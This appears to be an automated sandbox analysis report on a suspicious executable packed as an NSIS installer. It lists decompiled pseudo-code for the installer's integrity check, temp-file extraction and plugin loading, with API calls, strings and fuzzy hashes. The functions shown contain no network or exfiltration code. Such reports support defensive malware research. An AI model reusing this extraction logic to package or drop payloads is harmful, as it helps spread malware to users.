                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\5SXTKXCnqS.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                    • API String ID: 914957316-370566123
                                                                                    • Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                    • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                    • Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                    • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\5SXTKXCnqS.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\alfons\\Desktop\\5SXTKXCnqS.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\5SXTKXCnqS.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x440f2
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x8000
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                                                                    0x00402c80
                                                                                    0x00402c83
                                                                                    0x00402c9d
                                                                                    0x00402ca2
                                                                                    0x00402cb5
                                                                                    0x00402cba
                                                                                    0x00402cc0
                                                                                    0x00000000
                                                                                    0x00402cc2
                                                                                    0x00402cd3
                                                                                    0x00402ce4
                                                                                    0x00402ceb
                                                                                    0x00402cf3
                                                                                    0x00402cf8
                                                                                    0x00402cfa
                                                                                    0x00402dea
                                                                                    0x00402dec
                                                                                    0x00402df8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402e01
                                                                                    0x00402e2d
                                                                                    0x00402e32
                                                                                    0x00402e3d
                                                                                    0x00402e3f
                                                                                    0x00402e50
                                                                                    0x00402e6b
                                                                                    0x00402e74
                                                                                    0x00402e79
                                                                                    0x00402e98
                                                                                    0x00402ea8
                                                                                    0x00402eba
                                                                                    0x00402ebf
                                                                                    0x00402ec7
                                                                                    0x00402ed4
                                                                                    0x00402edc
                                                                                    0x00402ee1
                                                                                    0x00402ee3
                                                                                    0x00402ee3
                                                                                    0x00402eeb
                                                                                    0x00402eeb
                                                                                    0x00402eee
                                                                                    0x00402eef
                                                                                    0x00402eef
                                                                                    0x00402ef2
                                                                                    0x00402ef4
                                                                                    0x00402ef4
                                                                                    0x00402ef7
                                                                                    0x00402efe
                                                                                    0x00402f0a
                                                                                    0x00000000
                                                                                    0x00402f0f
                                                                                    0x00000000
                                                                                    0x00402ec7
                                                                                    0x00000000
                                                                                    0x00402e7b
                                                                                    0x00402e09
                                                                                    0x00402e1b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d00
                                                                                    0x00402d00
                                                                                    0x00402d05
                                                                                    0x00402d09
                                                                                    0x00402d10
                                                                                    0x00402d17
                                                                                    0x00402d19
                                                                                    0x00402d19
                                                                                    0x00402d21
                                                                                    0x00402d28
                                                                                    0x00402e87
                                                                                    0x00402ec9
                                                                                    0x00000000
                                                                                    0x00402ec9
                                                                                    0x00402d34
                                                                                    0x00402db8
                                                                                    0x00402dbb
                                                                                    0x00402dc0
                                                                                    0x00000000
                                                                                    0x00402db8
                                                                                    0x00402d41
                                                                                    0x00402d46
                                                                                    0x00402d4e
                                                                                    0x00402d74
                                                                                    0x00402d7a
                                                                                    0x00402d83
                                                                                    0x00402d89
                                                                                    0x00402d8e
                                                                                    0x00402d94
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d9e
                                                                                    0x00402da6
                                                                                    0x00402da9
                                                                                    0x00402dae
                                                                                    0x00402db0
                                                                                    0x00402db0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d9e
                                                                                    0x00402dc1
                                                                                    0x00402dc7
                                                                                    0x00402dd7
                                                                                    0x00402dd7
                                                                                    0x00402dda
                                                                                    0x00402de0
                                                                                    0x00402de2
                                                                                    0x00000000
                                                                                    0x00402d00

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00402C86
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\5SXTKXCnqS.exe,00000400), ref: 00402CA2
                                                                                      • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\5SXTKXCnqS.exe,80000000,00000003), ref: 00405841
                                                                                      • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5SXTKXCnqS.exe,C:\Users\user\Desktop\5SXTKXCnqS.exe,80000000,00000003), ref: 00402CEB
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32
                                                                                    Strings
                                                                                    • Null, xrefs: 00402D6B
                                                                                    • "C:\Users\user\Desktop\5SXTKXCnqS.exe" , xrefs: 00402C7F
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                    • soft, xrefs: 00402D62
                                                                                    • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                    • Inst, xrefs: 00402D59
                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                    • C:\Users\user\Desktop\5SXTKXCnqS.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                    • Error launching installer, xrefs: 00402CC2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\5SXTKXCnqS.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5SXTKXCnqS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                    • API String ID: 2803837635-884633812
                                                                                    • Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                    • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                    • Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                    • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 75%
                                                                                    			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\alfons\AppData\Local\Temp\nsaC26E.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\alfons\AppData\Local\Temp\nsaC26E.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                    0x00401734
                                                                                    0x0040173b
                                                                                    0x00401744
                                                                                    0x00401747
                                                                                    0x0040174a
                                                                                    0x0040174f
                                                                                    0x00401757
                                                                                    0x00401773
                                                                                    0x00401759
                                                                                    0x00401759
                                                                                    0x0040175a
                                                                                    0x0040175a
                                                                                    0x00401779
                                                                                    0x00401783
                                                                                    0x00401783
                                                                                    0x00401787
                                                                                    0x0040178a
                                                                                    0x0040178f
                                                                                    0x00401791
                                                                                    0x00401793
                                                                                    0x00401798
                                                                                    0x00401798
                                                                                    0x004017a3
                                                                                    0x004017a3
                                                                                    0x004017b4
                                                                                    0x004017b6
                                                                                    0x004017b6
                                                                                    0x004017b7
                                                                                    0x004017b7
                                                                                    0x004017ba
                                                                                    0x004017bd
                                                                                    0x004017c0
                                                                                    0x004017c0
                                                                                    0x004017c7
                                                                                    0x004017d6
                                                                                    0x004017db
                                                                                    0x004017de
                                                                                    0x004017e1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004017e3
                                                                                    0x004017e6
                                                                                    0x00401840
                                                                                    0x00401845
                                                                                    0x004015a8
                                                                                    0x0040265c
                                                                                    0x0040265c
                                                                                    0x0040288b
                                                                                    0x0040288e
                                                                                    0x0040288e
                                                                                    0x00000000
                                                                                    0x004017e8
                                                                                    0x004017ee
                                                                                    0x004017f9
                                                                                    0x00401806
                                                                                    0x00401811
                                                                                    0x00401827
                                                                                    0x00401827
                                                                                    0x0040182a
                                                                                    0x00000000
                                                                                    0x00401830
                                                                                    0x00401830
                                                                                    0x00401831
                                                                                    0x0040184e
                                                                                    0x00402894
                                                                                    0x00402894
                                                                                    0x00402894
                                                                                    0x00401833
                                                                                    0x00401833
                                                                                    0x00401834
                                                                                    0x00401492
                                                                                    0x0040220e
                                                                                    0x0040220e
                                                                                    0x0040220e
                                                                                    0x00401831
                                                                                    0x0040182a
                                                                                    0x00402896
                                                                                    0x0040289a
                                                                                    0x0040289a
                                                                                    0x0040185e
                                                                                    0x00401863
                                                                                    0x00401871
                                                                                    0x00401876
                                                                                    0x0040187c
                                                                                    0x00401880
                                                                                    0x00401882
                                                                                    0x0040188a
                                                                                    0x00401896
                                                                                    0x00401884
                                                                                    0x00401884
                                                                                    0x00401888
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401888
                                                                                    0x0040189f
                                                                                    0x004018a5
                                                                                    0x004018a7
                                                                                    0x00000000
                                                                                    0x004018ad
                                                                                    0x004018ad
                                                                                    0x004018b0
                                                                                    0x004018c8
                                                                                    0x004018b2
                                                                                    0x004018b5
                                                                                    0x004018be
                                                                                    0x004018be
                                                                                    0x004018cd
                                                                                    0x004018d2
                                                                                    0x00402209
                                                                                    0x00000000
                                                                                    0x00402209
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                      • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                      • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                      • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404F98
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FB2
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsaC26E.tmp$C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dll$Call
                                                                                    • API String ID: 1941528284-2423256193
                                                                                    • Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                    • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                    • Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                    • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                    0x00402f1d
                                                                                    0x00402f27
                                                                                    0x00402f30
                                                                                    0x00402f34
                                                                                    0x00402f3f
                                                                                    0x00402f3f
                                                                                    0x00402f47
                                                                                    0x00402f49
                                                                                    0x00402f50
                                                                                    0x00402f6c
                                                                                    0x00402f70
                                                                                    0x00403039
                                                                                    0x00403039
                                                                                    0x00000000
                                                                                    0x00402f7f
                                                                                    0x00402f82
                                                                                    0x00402f88
                                                                                    0x00402f8f
                                                                                    0x00402f92
                                                                                    0x00402f9b
                                                                                    0x00403008
                                                                                    0x0040300e
                                                                                    0x00403010
                                                                                    0x00403010
                                                                                    0x00403022
                                                                                    0x00403026
                                                                                    0x00000000
                                                                                    0x00403028
                                                                                    0x00403028
                                                                                    0x0040302b
                                                                                    0x00403031
                                                                                    0x00000000
                                                                                    0x00403031
                                                                                    0x00402f9d
                                                                                    0x00402fa0
                                                                                    0x00403034
                                                                                    0x00403034
                                                                                    0x00402fa6
                                                                                    0x00402fab
                                                                                    0x00402fab
                                                                                    0x00402fb3
                                                                                    0x00402fb5
                                                                                    0x00402fb5
                                                                                    0x00402fc6
                                                                                    0x00402fca
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402fde
                                                                                    0x00402fe6
                                                                                    0x00403004
                                                                                    0x0040303b
                                                                                    0x0040303b
                                                                                    0x00402fed
                                                                                    0x00402fed
                                                                                    0x00402ff0
                                                                                    0x00402ff3
                                                                                    0x00402ff6
                                                                                    0x00403000
                                                                                    0x00000000
                                                                                    0x00403002
                                                                                    0x00000000
                                                                                    0x00403002
                                                                                    0x00403000
                                                                                    0x00000000
                                                                                    0x00402fe6
                                                                                    0x00000000
                                                                                    0x00402fab
                                                                                    0x00402fa0
                                                                                    0x00402f9b
                                                                                    0x00402f92
                                                                                    0x00402f70
                                                                                    0x0040303c
                                                                                    0x00403040

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                    • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                    • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                    • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$Read$PointerWrite
                                                                                    • String ID: @0A
                                                                                    • API String ID: 2113905535-1363546919
                                                                                    • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                    • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                    • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                    • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 94%
                                                                                    			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x440f2
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x3bf92
